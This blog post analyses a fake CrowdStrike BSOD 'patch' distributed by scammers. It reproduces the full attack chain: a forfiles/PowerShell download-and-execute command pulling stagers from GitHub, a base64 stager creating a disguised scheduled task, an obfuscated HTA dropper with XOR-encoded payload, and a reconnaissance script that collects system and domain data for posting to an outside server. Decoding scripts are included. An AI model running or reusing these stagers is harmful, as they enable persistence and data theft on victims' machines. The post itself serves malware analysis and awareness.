Malware Report: CrowdStrike's BSOD Bug and the Rise of Fake Support Scams
Figure 1: Fake CrowdStrike Support Email
In a dramatic turn of events, CrowdStrike's latest update inadvertently triggered the dreaded Blue Screen of Death (BSOD) for numerous users, disrupting millions of systems around the globe. As if the chaos wasn't enough, opportunistic threat actors seized the moment, posing as CrowdStrike support to distribute malware under the guise of critical fixes. This blog post unravels the double-edged disaster, exposing the cunning strategies of these digital impostors.
Disclaimer
The content presented on this blog is intended for educational purposes only. The information provided is designed to increase awareness and understanding of cybersecurity concepts, strategies, and practices. The scenarios, techniques, and tools discussed are for learning and informational purposes and should not be used for any illegal or unethical activities. The author and contributors are not responsible for any misuse of the information provided. Readers are encouraged to apply the knowledge gained from this blog responsibly and in accordance with all applicable laws and regulations.
The Zip
First, I start things off by grabbing the zip file of this so-called “patch” from the URL found in the email (hxxps[://]files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/cs-patch-19[.]zip). Inside the zip lies a CMD file titled “CS_patch_19.07.24.cmd”. See the Artifacts section for more details.
Figure 2: Contents of zip file after extraction
CMD File Analysis
The CMD file contains the following command:
"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell -c iex (iwr https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1);iwr https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2 -o $env:C:\Users\[REDACTED]\Documents\update.hta"
Here is a breakdown of the script:
This script is a command that uses forfiles.exe to execute a PowerShell command. Let's break it down step by step:
1. ForFiles.exe:
"C:\Windows\System32\forfiles.exe"
- This is the path to the forfiles utility, a command-line tool in Windows that selects files and runs a command on each file that meets certain criteria.
2. VSS:
/p C:\Windows\Vss
- The /p option specifies the path to the directory where forfiles should operate. In this case, it's pointing to the C:\Windows\Vss directory, which is the Volume Shadow Copy Service (VSS) directory in Windows.
3. Update.hta:
/c "powershell -c iex (iwr https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1);iwr https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2 -o $env:C:\Users\[REDACTED]\Documents\update.hta"
- The /c option specifies the command to execute for each file. In this case, the command is invoking PowerShell to run a script.
- powershell -c: Runs the command specified in quotes directly in PowerShell.
- iex (iwr https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1): iex stands for Invoke-Expression, which executes the command or expression provided to it. iwr is an alias for Invoke-WebRequest, which downloads content from a URL.
- This part of the script downloads and executes a script from the URL https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1. The contents of the file at that URL are executed directly in PowerShell.
- Stager1 Script:
Figure 3: Stage 1 script that gets executed by the CMD script
powershell -w hidden -e MQAuAC4ANgAwACAAfAAgACUAIAB7AHMAbABlAGUAcAAgADEAfQA7ACQAcwAxAD0AJABlAG4AdgA6AHQAbQBwACsAIgBcAHUAcABkAGEAdABlAC4AaAB0AGEAIgA7AHMAYwBoAHQAYQBzAGsAcwAgAC8AYwByAGUAYQB0AGUAIAAvAFMAYwAgAG0AaQBuAHUAdABlACAALwBmACAALwBUAG4AIABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlACAALwBtAG8AIAAzADAAIAAvAHQAcgAgACIAbQBzAGgAdABhACAAJABzADEAIgA=
Following this is stage 2 of the script:
iwr https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2 -o $env:C:\Users\[REDACTED]\Documents\update.hta
- Again, iwr is used to download a file, but this time the -o option (short for -OutFile) is used to save the downloaded content to a specific file.
- The script downloads a file from https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2 and saves it to C:\Users\[REDACTED]\Documents\update.hta.
- Stager2 Script:
Figure 4: Stage 2 script that gets executed by the CMD script
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="#" SYSMENU = "no" BORDER="no" SHOWINTASKBAR="no" CAPTION="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize" >
<script type="text/vbscript">
Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
r.Open "GET", "http"&"://ipinfo"&".io/coun"&"try", False
r.Send
geo = InStr(r.responseText, "VN")
If geo <= 0 Then
    self.close
End If
Set o = CreateObject("WS"+"cr"+"ip"+"t."+"S"+"he"+"l"+"l")
mostlycloudfortomorrowcontent = "qnvdsrIDmM!,onQsNghm!!,dydbTUHno!!CXq@RR!!,bnlL`Oe!hdy)ZRxrudl/Udyu/Dobnehof\;;TUG9/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)&`VXfJBfnJDemeB0YcVmQXlqmX2PfW3mtL{KgP38ubIW1[YKUdYO1[V1qMoCiboSw[lSwcVGqchjfMVWyHBSFXVy{[R@qHB0wbh@nHB0tc2PfKDWtekqWT1WRSD4USD8OPTmNJRjOBh@fHBC6EPnfHB@fHB@fHBSEcET1bV[MSR@8HBKDU10CRT57HD4QXF4fchHOBh@fHBC8HFWrb3Tfdx@jP3v0OIGlR1TfQR@hSD8OPTmNNhC[SWOfclCtHo1OBhSEcET1bV[MSR@sQR@hT0mUWDWORT4FU{qfclCtHh@sHBfnb2m{eFWu`V4lcxjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcjmPP18NSjmINlCtXF5hHBrfJBiqbFOwcl[q[x@wXVyrJR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtUjWTT0SCWEqfclCtHh@sHBfnclW1b2SieB@u[hjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcj4GWG[KSWb7XF4fchHfJx@nJF4meBC3`VW2JR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtWDGUR1yKT0P7XF4fchHfJx@nJISib3ur`YO1JR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtW1iQPT0KNlCtXF5hHBrfJBi2`F8icVjqHB0pc3mtHBKfchHqEPnjP3v0OIGlR1TfJ{1fHlCtXF4WT1WRUjGOSUqfclCtHh@sHBfnclW1HIW{[YHfKFWtekq0b3WxclGu[R@w[F8uXVmtJR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtSD8OPTmNHDGDUTmNT{qfclCtHh@sHBfnclW1HFexc2WvHBKjc30i`V5fXVSu`V4{Hh@w[F8uXVmtHBjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcjSGT1uTU0@7XF4fchHfJx@nS3W1MTOn`VyjRYSmcR@nV3Wtelmxc34u[V41YUn7[3W1[l8r[FWxbFG1`Bfh[FW{`2SwbBHqJRC9HD80eB0UeIKqclbqEPnjP3v0OIGlR1TfJ{1fHlCtXF4CWkqfclCtHh@sHBiI[YPuW30qU3Kp[VO1HB0NXV0mb2CiX3TfHoKwc2SbT3WkeYKqeImE[V41[YHxHh@uTYWmbojfHmOGUDWEWB@pHD[RU11fPV41`W[qboW{TIKw[IWkeBHqMlSqb2CrXYmNXV0mEPnjVVWxUYm2[YHfQRCcT2m{eFWuMmSmdIPtSV4kc3SqcleeNkqWWDX5MjemeDK4eFW{JBSEcET1bV[MSRjOBhSGclO[[YHfQWuEc343[YK1YUn7WF8BXYOmOkSUeIKqclbnKGmmbj04e3WxJP1JKGW4Lj4Fbx@8HBH5NED1OUD2OVKhNVWlLEf5X{Xy[kWiXk@5NUbvLVSjOxH6EPnjbEC{eG@1bkSuHE1fPIuvXYO{QRSWdUKNSoL6[FG1XU1jSV4kVVWxgP1J`YexHB0Wbljf`IS1bEnwM30m[3GkdVKmbl4me2LtX38uM3On[VOs`V5tbFivHB0O[YSnc3PfTD8UWB@uPl8jdR@jbEC{eG@1bkSu&((("
dIaNadIaNadIaNadIaNadIaNadIaNa = ""
For i = 0 To Len(mostlycloudfortomorrowcontent) - 1
    dIaNadIaNadIaNadIaNadIaNadIaNa = dIaNadIaNadIaNadIaNadIaNadIaNa & Chr(Asc(Mid(mostlycloudfortomorrowcontent, i + 1, 1)) Xor 1)
Next
o.run dIaNadIaNadIaNadIaNadIaNadIaNa, 0, false
self.close
</script>
</head>
<body>
</body>
</html>
Stager1 Analysis:
1. PowerShell Command:
powershell -w hidden -e MQAuAC4ANgAwACAAfAAgACUAIAB7AHMAbABlAGUAcAAgADEAfQA7ACQAcwAxAD0AJABlAG4AdgA6AHQAbQBwACsAIgBcAHUAcABkAGEAdABlAC4AaAB0AGEAIgA7AHMAYwBoAHQAYQBzAGsAcwAgAC8AYwByAGUAYQB0AGUAIAAvAFMAYwAgAG0AaQBuAHUAdABlACAALwBmACAALwBUAG4AIABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlACAALwBtAG8AIAAzADAAIAAvAHQAcgAgACIAbQBzAGgAdABhACAAJABzADEAIgA=
- -w hidden: This argument hides the PowerShell window when the script is executed. This is often used to run scripts stealthily, without showing any command windows to the user.
- -e (or -EncodedCommand): This flag tells PowerShell that the following string is a Base64-encoded command that needs to be decoded and executed.
2. Decoding the Base64 String:
The Base64-encoded string is:
MQAuAC4ANgAwACAAfAAgACUAIAB7AHMAbABlAGUAcAAgADEAfQA7ACQAcwAxAD0AJABlAG4AdgA6AHQAbQBwACsAIgBcAHUAcABkAGEAdABlAC4AaAB0AGEAIgA7AHMAYwBoAHQAYQBzAGsAcwAgAC8AYwByAGUAYQB0AGUAIAAvAFMAYwAgAG0AaQBuAHUAdABlACAALwBmACAALwBUAG4AIABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlACAALwBtAG8AIAAzADAAIAAvAHQAcgAgACIAbQBzAGgAdABhACAAJABzADEAIgA=
Let's decode this string to reveal the actual PowerShell script.
3. Decoded PowerShell Script:
After decoding the Base64 string, the decoded script is:
1..60 | % {sleep 1};$s1=$env:tmp+"\update.hta";schtasks /create /Sc minute /f /Tn MicrosoftEdgeUpdate /mo 30 /tr "mshta $s1"
4. Breaking Down the Decoded Script:
1..60 | % {sleep 1};
- This is a loop that iterates 60 times, with each iteration pausing execution for 1 second (sleep 1). This effectively introduces a delay of 60 seconds before the next command is executed.
$s1=$env:tmp+"\update.hta";
- This command sets the variable $s1 to the path of a file named update.hta in the system's temporary directory ($env:tmp). The HTA (HTML Application) file format can be used to execute scripts, which often makes it a tool for malicious activities.
schtasks /create /Sc minute /f /Tn MicrosoftEdgeUpdate /mo 30 /tr "mshta $s1"
- This command creates a new scheduled task using the Windows schtasks utility:
- /Sc minute: The task is scheduled on a minute-based interval.
- /f: Forces the creation of the task, even if it already exists.
- /Tn MicrosoftEdgeUpdate: The name of the task is MicrosoftEdgeUpdate.
- /mo 30: The task is set to trigger every 30 minutes.
- /tr "mshta $s1": The task runs the mshta command, which executes the update.hta file stored in the temporary directory.
Stager1 Summary:
This PowerShell script is designed to:
- Wait for 60 seconds.
- Create a scheduled task named MicrosoftEdgeUpdate that runs every 30 minutes.
- Use mshta, via that task, to execute a file named update.hta located in the temporary directory.
Security Implications:
- Stealth Execution: The script is hidden from the user (-w hidden), making it harder to detect.
- Scheduled Task Creation: The script creates a scheduled task that could persistently execute a potentially malicious script every 30 minutes.
- Potential Malware: The use of an .hta file (HTML Application) and mshta is a common technique used in malware to execute arbitrary code.
This script has the characteristics of malware, or of a persistence mechanism used by attackers to maintain access to a compromised system.
Stager2 Analysis:
This script is an HTML Application (HTA) file written in VBScript. HTA files are similar to regular HTML files but have the ability to run scripts with full access to the Windows environment, making them potentially dangerous if used maliciously. Let’s break down the components of the script:
1. HTA Metadata:
<HTA:APPLICATION
ID="#"
SYSMENU = "no"
BORDER="no"
SHOWINTASKBAR="no"
CAPTION="no"
SINGLEINSTANCE="yes"
WINDOWSTATE="minimize">
- ID="#": Assigns an ID to the application, though it's set to #, which is unusual and might indicate a placeholder.
- SYSMENU="no": Disables the system menu (the menu that appears when you right-click the title bar).
- BORDER="no": Removes the window border.
- SHOWINTASKBAR="no": Prevents the application from showing in the taskbar.
- CAPTION="no": Removes the window caption (title).
- SINGLEINSTANCE="yes": Ensures only one instance of the HTA runs at a time.
- WINDOWSTATE="minimize": Starts the application minimized.
2. VBScript Section:
<script type="text/vbscript">
Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
r.Open "GET", "http"&"://ipinfo"&".io/coun"&"try", False
r.Send
geo = InStr(r.responseText, "VN")
If geo <= 0 Then
self.close
End If
- Set r = CreateObject("WinHttp.WinHttpRequest.5.1"): Creates an object to make HTTP requests.
- r.Open "GET", "http://ipinfo.io/country", False: Opens an HTTP GET request to the ipinfo.io service to retrieve the user's country information. In the source the URL is assembled from concatenated fragments ("http"&"://ipinfo"&".io/coun"&"try") so the whole string never appears literally.
- r.Send: Sends the HTTP request.
- geo = InStr(r.responseText, "VN"): Checks whether the response (the country code) contains "VN" (which stands for Vietnam).
- If geo <= 0 Then self.close: If the country code is not "VN", the script closes the HTA, essentially exiting the program. This is a form of geo-filtering: the script only proceeds on hosts reporting Vietnam and exits everywhere else.
3. Decryption and Execution:
Set o = CreateObject("WS"+"cr"+"ip"+"t."+"S"+"he"+"l"+"l")
mostlycloudfortomorrowcontent = "qnvdsrIDmM!,onQsNghm!!,dydbTUHno!!CXq@RR!!..."
- Set o = CreateObject("WS"+"cr"+"ip"+"t."+"S"+"he"+"l"+"l"): Creates an object that can execute shell commands (WScript.Shell). The string is broken up to avoid simple detection methods.
- mostlycloudfortomorrowcontent: This variable contains an obfuscated/encrypted string, which appears to be a payload or script.
dIaNadIaNadIaNadIaNadIaNadIaNa = ""
For i = 0 To Len(mostlycloudfortomorrowcontent) - 1
    dIaNadIaNadIaNadIaNadIaNadIaNa = dIaNadIaNadIaNadIaNadIaNadIaNa & Chr(Asc(Mid(mostlycloudfortomorrowcontent, i + 1, 1)) Xor 1)
Next
o.run dIaNadIaNadIaNadIaNadIaNadIaNa, 0, false
- dIaNadIaNadIaNadIaNadIaNadIaNa = "": Initializes an empty string variable.
- For i = 0 To Len(mostlycloudfortomorrowcontent) - 1: Iterates through each character of the mostlycloudfortomorrowcontent string.
- Chr(Asc(Mid(mostlycloudfortomorrowcontent, i + 1, 1)) Xor 1): This line decrypts each character of the mostlycloudfortomorrowcontent string. Mid extracts one character at a time, Asc converts the character to its ASCII code, Xor 1 applies a bitwise XOR with 1 (effectively flipping the least significant bit), and Chr converts the modified ASCII code back to a character.
- o.run dIaNadIaNadIaNadIaNadIaNadIaNa, 0, false: Executes the decrypted content using the shell object. The 0 parameter hides the window, and false ensures the script continues running without waiting for the command to finish.
4. Closing the Script:
self.close
- self.close: Closes the HTA window, ending the script.
Let's deobfuscate the mostlycloudfortomorrowcontent string in Python to see what this script is hiding.
Deobfuscating Stager2
obfuscated_string = ("qnvdsrIDmM!,onQsNghm!!,dydbTUHno!!CXq@RR!!,bnlL`Oe!hdy)ZRxrudl/Udyu/Dobnehof\;;TUG9/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)&`VXfJBfnJDemeB0YcVmQXlqmX2PfW3mtL{KgP38ubIW1[YKUdYO1[V1qMoCiboSw[lSwcVGqchjfMVWyHBSFXVy{[R@qHB0wbh@nHB0tc2PfKDWt" +
"ekqWT1WRSD4USD8OPTmNJRjOBh@fHBC6EPnfHB@fHB@fHBSEcET1bV[MSR@8HBKDU10CRT57HD4QXF4fchHOBh@fHBC8HFWrb3Tfdx@jP3v0OIGlR1TfQR@hSD8OPTmNNhC[SWOfclCtHo1OBhSEcET1bV[MSR@sQR@hT0mUWDWORT4FU{qfclCtHh@sHBfnb2m{eFWu`V4lcxjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4f" +
"cjmPP18NSjmINlCtXF5hHBrfJBiqbFOwcl[q[x@wXVyrJR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtUjWTT0SCWEqfclCtHh@sHBfnclW1b2SieB@u[hjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcj4GWG[KSWb7XF4fchHfJx@nJF4meBC3`VW2JR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtWDG" +
"UR1yKT0P7XF4fchHfJx@nJISib3ur`YO1JR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtW1iQPT0KNlCtXF5hHBrfJBi2`F8icVjqHB0pc3mtHBKfchHqEPnjP3v0OIGlR1TfJ{1fHlCtXF4WT1WRUjGOSUqfclCtHh@sHBfnclW1HIW{[YHfKFWtekq0b3WxclGu[R@w[F8uXVmtJR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtSD8OP" +
"TmNHDGDUTmNT{qfclCtHh@sHBfnclW1HFexc2WvHBKjc30i`V5fXVSu`V4{Hh@w[F8uXVmtHBjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcjSGT1uTU0@7XF4fchHfJx@nS3W1MTOn`VyjRYSmcR@nV3Wtelmxc34u[V41YUn7[3W1[l8r[FWxbFG1`Bfh[FW{`2SwbBHqJRC9HD80eB0UeIKqclbqEPnjP3v0OIGlR1TfJ{1fHlCtXF4CWkqfclCtHh@sHBiI[YP" +
"uW30qU3Kp[VO1HB0NXV0mb2CiX3TfHoKwc2SbT3WkeYKqeImE[V41[YHxHh@uTYWmbojfHmOGUDWEWB@pHD[RU11fPV41`W[qboW{TIKw[IWkeBHqMlSqb2CrXYmNXV0mEPnjVVWxUYm2[YHfQRCcT2m{eFWuMmSmdIPtSV4kc3SqcleeNkqWWDX5MjemeDK4eFW{JBSEcET1bV[MSRjOBhSGclO[[YHfQWuEc343[YK1YUn7WF8BXYOmOkSUeIKqclbnKGmmbj04e3WxJP1" +
"JKGW4Lj4Fbx@8HBH5NED1OUD2OVKhNVWlLEf5X{Xy[kWiXk@5NUbvLVSjOxH6EPnjbEC{eG@1bkSuHE1fPIuvXYO{QRSWdUKNSoL6[FG1XU1jSV4kVVWxgP1J`YexHB0Wbljf`IS1bEnwM30m[3GkdVKmbl4me2LtX38uM3On[VOs`V5tbFivHB0O[YSnc3PfTD8UWB@uPl8jdR@jbEC{eG@1bkSu&(((")
# Function to XOR each character with 1 and convert it back to characters.
# This mirrors the HTA's Chr(Asc(c) Xor 1) loop; XOR with 1 is its own inverse.
def xor_decode(encoded_str):
    decoded_chars = [chr(ord(char) ^ 1) for char in encoded_str]
    return ''.join(decoded_chars)

# Decode the obfuscated string
decoded_string = xor_decode(obfuscated_string)
print(decoded_string)
Here's how the script works:
I assign a variable named obfuscated_string; as the name suggests, this variable contains the obfuscated string from the stager 2 HTA script, which was assigned to mostlycloudfortomorrowcontent. Following the obfuscated_string variable, a function named xor_decode is defined which decodes a given encoded string (in this case the obfuscated_string variable) using a simple XOR operation. Let's break down how the function works:
1. Function Definition:
def xor_decode(encoded_str):
- The function xor_decode takes one argument, encoded_str, which is expected to be a string that has been encoded using a specific XOR operation.
2. List Comprehension to Decode Characters:
decoded_chars = [chr(ord(char) ^ 1) for char in encoded_str]
- This line of code performs the core decoding operation using a list comprehension. Let's break down each part:
- for char in encoded_str: This iterates over each character (char) in the input string encoded_str.
- ord(char): The ord() function takes a character (char) and returns its ASCII value (an integer).
- ord(char) ^ 1: The XOR operation (^) is applied to the ASCII value of the character and 1. XOR with 1 effectively flips the least significant bit of the ASCII value.
- chr(ord(char) ^ 1): The chr() function converts the resulting integer back into a character after the XOR operation.
- The result is a list of decoded characters (decoded_chars), where each character in encoded_str has been XORed with 1.
3. Join Decoded Characters into a String:
return ''.join(decoded_chars)
- After decoding, the list of characters is joined back together into a single string using ''.join(decoded_chars).
- The decoded string is then returned as the output of the function.
After running the script to deobfuscate the string, I was left with more obfuscated PowerShell:
powersHElL -noPrOfil -execUTIon BYpASS -comMaNd iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWYgKCgoKEdldC1XbWlPYmplY3QgV2luMzJfQ29tcHV0ZXJTeXN0ZW0pLnBhcnRvZmRvbWFpbikgLWVxICRGYWxzZSApIC1vciAoIC1ub3QgJEVudjpVU0VSRE5TRE9NQUlOKSkNCiAgICB7DQogICAgICAgICRDbDU0cWZLRSA9ICJET01BSU46IE5PYG5gbiINCiAgICB9IGVsc2UgeyAkQ2w1NHFmS0UgPSAiRE9NQUlOOiBZRVNgbmBuIn0NCiRDbDU0cWZLRSArPSAiU1lTVEVNSU5GTzpgbmBuIiArICgoc3lzdGVtaW5mbykgLWpvaW4gImBuIikNCiRDbDU0cWZLRSArPSAiYG5gbklQQ09ORklHOmBuYG4iICsgKChpcGNvbmZpZyAvYWxsKSAtam9pbiAiYG4iKQ0KJENsNTRxZktFICs9ICJgbmBuTkVUU1RBVDpgbmBuIiArICgobmV0c3RhdCAtZikgLWpvaW4gImBuIikNCiRDbDU0cWZLRSArPSAiYG5gbk5FVFZJRVc6YG5gbiIgKyAoKG5ldCB2aWV3KSAtam9pbiAiYG4iKQ0KJENsNTRxZktFICs9ICJgbmBuVEFTS0xJU1Q6YG5gbiIgKyAoKHRhc2tsaXN0KSAtam9pbiAiYG4iKQ0KJENsNTRxZktFICs9ICJgbmBuV0hPQU1JOmBuYG4iICsgKCh3aG9hbWkpIC1qb2luICJgbiIpDQokQ2w1NHFmS0UgKz0gImBuYG5VU0VSTkFNRTpgbmBuIiArICgobmV0IHVzZXIgJGVudjp1c2VybmFtZSAvZG9tYWluKSAtam9pbiAiYG4iKQ0KJENsNTRxZktFICs9ICJgbmBuRE9NQUlOIEFETUlOUzpgbmBuIiArICgobmV0IGdyb3VwICJkb21haW4gYWRtaW5zIiAvZG9tYWluICkgLWpvaW4gImBuIikNCiRDbDU0cWZLRSArPSAiYG5gbkRFU0tUT1A6YG5gbiIgKyAoR2V0LUNoaWxkSXRlbSAoW2Vudmlyb25tZW50XTo6Z2V0Zm9sZGVycGF0aCgiZGVza3RvcCIpKSB8IE91dC1TdHJpbmcpDQokQ2w1NHFmS0UgKz0gImBuYG5BVjpgbmBuIiArIChHZXQtV21pT2JqZWN0IC1OYW1lc3BhY2UgInJvb3RcU2VjdXJpdHlDZW50ZXIyIiAtUXVlcnkgIlNFTEVDVCAqIEZST00gQW50aVZpcnVzUHJvZHVjdCIpLmRpc3BsYXlOYW1lDQokWWVyTXl3ZXIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRDbDU0cWZLRSkNCiRFbmNZZXIgPVtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoJFllck15d2VyKQ0KJFV5Mk5GcyA9ICI4ODE0NTE3NWJiOWVmMDg4YzYxZjVhYjA4OTcwMWRkNyI7DQokcDBzdFA0cjRtID0gQHtwYXNzPSRVeTJORnM7ZGF0YT0kRW5jWWVyfQ0KaXdyIC1VcmkgaHR0cDovL21lZ2FjeWJlcm5ld3MuY29tL2NoZWNraW4ucGhwIC1NZXRob2QgUE9TVCAtQm9keSAkcDBzdFA0cjRt')))
Breakdown:
powersHElL -noPrOfil -execUTIon BYpASS -comMaNd
- powersHElL: This starts a PowerShell session. The mixed-case spelling "powersHElL" (instead of "powershell") is intended to bypass basic string-matching detection.
- -noPrOfil: This flag tells PowerShell not to load the user profile when starting the session, ensuring a clean environment without any custom configuration or scripts that might be in the user's profile.
- -execUTIon BYpASS: This flag overrides the execution policy for the session, allowing the script to run even if the system's execution policy would normally prevent it.
- -comMaNd: This indicates that what follows is a command to be executed by PowerShell.
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[BASE64_STRING]')))
- iex (Invoke-Expression): This cmdlet executes the string as a PowerShell command. It effectively runs whatever code is inside the parentheses after it has been decoded from Base64.
- [System.Text.Encoding]::UTF8.GetString(...): Converts the byte array produced by the Base64 decode back into a readable string using UTF-8 encoding.
- [System.Convert]::FromBase64String('[BASE64_STRING]'): Decodes the Base64-encoded string (here represented by [BASE64_STRING]) back into its original byte array.
- In essence, this part of the script decodes the Base64 string and then runs the decoded content as a PowerShell command.
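To carry the decoding through all three layers the analysis above walks one at a time (stager1's -EncodedCommand, the HTA's XOR-1 loop, and the FromBase64String wrapper), here is an added Python helper that is not part of the original post. The stager1 base64 is the one quoted earlier; the XOR-1 input it unwraps is a constructed, harmless stand-in built the same way the HTA wraps its payload, and the post's own obfuscated_string value can be passed to unwrap_stager2 in the same way.

```python
import base64
import re

# The real -EncodedCommand argument from stager1 as quoted in this post
# (PowerShell -e takes base64 of the UTF-16LE encoded script).
STAGER1_ENCODED = (
    "MQAuAC4ANgAwACAAfAAgACUAIAB7AHMAbABlAGUAcAAgADEAfQA7ACQA"
    "cwAxAD0AJABlAG4AdgA6AHQAbQBwACsAIgBcAHUAcABkAGEAdABlAC4A"
    "aAB0AGEAIgA7AHMAYwBoAHQAYQBzAGsAcwAgAC8AYwByAGUAYQB0AGUA"
    "IAAvAFMAYwAgAG0AaQBuAHUAdABlACAALwBmACAALwBUAG4AIABNAGkA"
    "YwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlACAALwBtAG8A"
    "IAAzADAAIAAvAHQAcgAgACIAbQBzAGgAdABhACAAJABzADEAIgA="
)


def decode_encoded_command(b64: str) -> str:
    """Layer 1: reverse `powershell -e <b64>`; the bytes are UTF-16LE, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def xor1(text: str) -> str:
    """Layer 2: the HTA's Chr(Asc(c) Xor 1) loop. XOR with 1 is its own inverse,
    so the same function both obfuscates and deobfuscates."""
    return "".join(chr(ord(c) ^ 1) for c in text)


_B64_LITERAL = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def decode_inner_base64(ps_wrapper: str) -> str:
    """Layer 3: pull the literal out of FromBase64String('...') in the decoded
    wrapper and decode it the way [Text.Encoding]::UTF8.GetString does."""
    m = _B64_LITERAL.search(ps_wrapper)
    if m is None:
        raise ValueError("no FromBase64String('...') literal in wrapper")
    return base64.b64decode(m.group(1)).decode("utf-8")


def unwrap_stager2(obfuscated: str) -> dict:
    """Peel both stager2 layers: XOR-1 text -> PowerShell wrapper -> final script."""
    wrapper = xor1(obfuscated)
    return {"wrapper": wrapper, "script": decode_inner_base64(wrapper)}


# Constructed stand-in for the real mostlycloudfortomorrowcontent value: a harmless
# script wrapped exactly as stager2 wraps its payload, then XOR-1 obfuscated.
_SAMPLE_SCRIPT = "Write-Output 'constructed sample'\r\n"
_SAMPLE_WRAPPER = (
    "powersHElL -noPrOfil -execUTIon BYpASS -comMaNd iex([System.Text.Encoding]"
    "::UTF8.GetString([System.Convert]::FromBase64String('"
    + base64.b64encode(_SAMPLE_SCRIPT.encode("utf-8")).decode("ascii")
    + "')))"
)
SAMPLE_OBFUSCATED = xor1(_SAMPLE_WRAPPER)

if __name__ == "__main__":
    print(decode_encoded_command(STAGER1_ENCODED))
    peeled = unwrap_stager2(SAMPLE_OBFUSCATED)
    print(peeled["wrapper"])
    print(peeled["script"])
```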
This decoded PowerShell script is designed to collect detailed information about the system it runs on, encode that information into Base64, and then send it to a remote server. Here's a breakdown of the script:
1. Domain Check:
if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
{
$Cl54qfKE = "DOMAIN: NO`n`n"
} else { $Cl54qfKE = "DOMAIN: YES`n`n"}
- (Get-WmiObject Win32_ComputerSystem).partofdomain: This checks whether the computer is part of a domain by querying the Win32_ComputerSystem WMI class.
- $Env:USERDNSDOMAIN: This checks whether the USERDNSDOMAIN environment variable is set, which is typically the case for domain-joined machines.
- The if statement: If the computer is not part of a domain (partofdomain -eq $False) or the USERDNSDOMAIN variable is not set, it sets the $Cl54qfKE variable to "DOMAIN: NO". Otherwise, it sets the variable to "DOMAIN: YES".
2. Collecting System Information:
$Cl54qfKE += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
$Cl54qfKE += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
$Cl54qfKE += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
$Cl54qfKE += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
$Cl54qfKE += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
$Cl54qfKE += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
$Cl54qfKE += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
$Cl54qfKE += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
$Cl54qfKE += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
$Cl54qfKE += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
The script appends various system and network information to the $Cl54qfKE variable:
- systeminfo: Outputs detailed information about the Windows system.
- ipconfig /all: Outputs detailed network configuration, including IP addresses, DNS servers, etc.
- netstat -f: Displays active network connections with their corresponding FQDNs (Fully Qualified Domain Names).
- net view: Lists shared resources available on the local network.
- tasklist: Lists all running processes on the system.
- whoami: Displays the currently logged-in user's information.
- net user $env:username /domain: Retrieves detailed information about the current user from the domain.
- net group "domain admins" /domain: Retrieves information about the members of the "domain admins" group.
- Get-ChildItem ([environment]::getfolderpath("desktop")): Lists all files and directories on the current user's desktop.
- Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct": Retrieves the name of the antivirus product installed on the system.
3. Encoding the Information:
$YerMywer = [System.Text.Encoding]::UTF8.GetBytes($Cl54qfKE)
$EncYer =[Convert]::ToBase64String($YerMywer)
- $YerMywer = [System.Text.Encoding]::UTF8.GetBytes($Cl54qfKE): Converts the collected information into a byte array using UTF-8 encoding.
- $EncYer =[Convert]::ToBase64String($YerMywer): Encodes the byte array into a Base64 string, stored in $EncYer.
